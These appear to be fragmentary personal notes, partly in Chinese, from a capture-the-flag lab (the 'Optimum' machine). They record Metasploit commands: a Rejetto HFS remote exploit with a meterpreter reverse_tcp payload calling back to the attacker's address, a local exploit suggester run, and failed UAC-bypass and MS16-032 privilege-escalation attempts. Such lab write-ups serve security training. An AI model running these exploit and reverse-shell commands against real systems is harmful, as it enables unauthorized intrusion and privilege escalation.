search suggester use post/multi/recon/local_exploit_suggester
[+] 10.10.10.8 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. [+] 10.10.10.8 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
use exploit/windows/local/bypassuac_eventvwr setSESSION1 set LHOST tun0 set LHOST tun0 不知道为什么要设置两遍,才能成功设置为该网卡 run 失败,用户不是admin组,不能提权
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc set LHOST tun0 set LHOST 10.10.14.17 setSESSION1 showoptions run 提权依然失败。
shell whoami optimum\kostas
net user Administrator Guest kostas
writeup
job.rc
1 2 3 4 5 6
use exploit/windows/http/rejetto_hfs_exec set RHOST 10.10.10.8 set payload windows/x64/meterpreter/reverse_tcp set LHOST 10.10.14.17 set SRVHOST 10.10.14.17 run
search exploit/windows/local use exploit/windows/local/ms16_032_secondary_logon_handle_privesc set payload windows/x64/meterpreter/reverse_tcp set SESSION 1 set LPORT 4445 set LHOST 10.10.14.17 set target 1 target0代表winx86, target1 代表winx64
又失败了
问题
在meterpreter上传文件的时候,会遇到这种问题: core_channel_open: Operation failed: Access is denied